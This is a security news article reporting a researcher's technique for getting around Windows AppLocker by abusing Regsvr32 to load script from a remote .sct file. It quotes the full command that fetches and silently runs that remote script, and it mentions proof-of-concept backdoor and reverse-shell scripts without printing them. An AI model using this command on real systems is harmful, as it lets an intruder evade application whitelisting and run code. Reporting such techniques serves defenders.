Windows AppLocker Bypassed to Execute Remote Scripts

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

When AppLocker was introduced in Windows 7 and Windows Server 2008 R2, Microsoft provided administrators with the ability to set rules to allow or deny applications from running. These rules could be enforced for specific users or groups and could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

In order to successfully bypass Windows AppLocker, an attacker needs to already have a foothold on the target machine, and also has to abuse Regsvr32, a command-line utility designed for registering DLLs in the registry, security researcher Casey Smith explains.

The researcher was looking for a way to register a script to bypass AppLocker, and discovered that the best way to do so is to place the script block inside of the Registration tag and then to call Regsvr32 to have the code executed. Moreover, Smith discovered that the code in the registration element executes on register and unregister.

Abusing Regsvr32 to execute the script comes with a series of benefits, as the command-line tool is proxy aware, uses TLS, follows redirects, and can also be set to run silently and to not display any message boxes.

“So, all you need to do is host your .sct file at a location you control. From the target, simply execute regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. It’s not well documented that Regsvr32 can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element,” the researcher explains.

Smith also said that the bypass can be used to call a local file, and that executing the script from the registration element doesn’t actually register the COM object, meaning that nothing will appear in registry. The researcher created a set of proof-of-concept scripts that can be loaded via Regsvr32 to open a backdoor or a reverse shell over HTTP.

Present even in Windows 10, the latest operating system version from Microsoft, AppLocker is considered as one of the most important security features in the platform. In February, when revealing Enhanced Mitigation Experience Toolkit (EMET) 5.5, Microsoft said that, next to Device Guard, and CFG, AppLocker is one of the Windows 10 features that provides equivalent (or better) mitigations than EMET.

This is not the first time the Regsvr32 component is found to provide intruders with the possibility to perform nefarious operations on target computers. In 2014, the Neverquest banking Trojanwas also abusing it to execute its DLL module.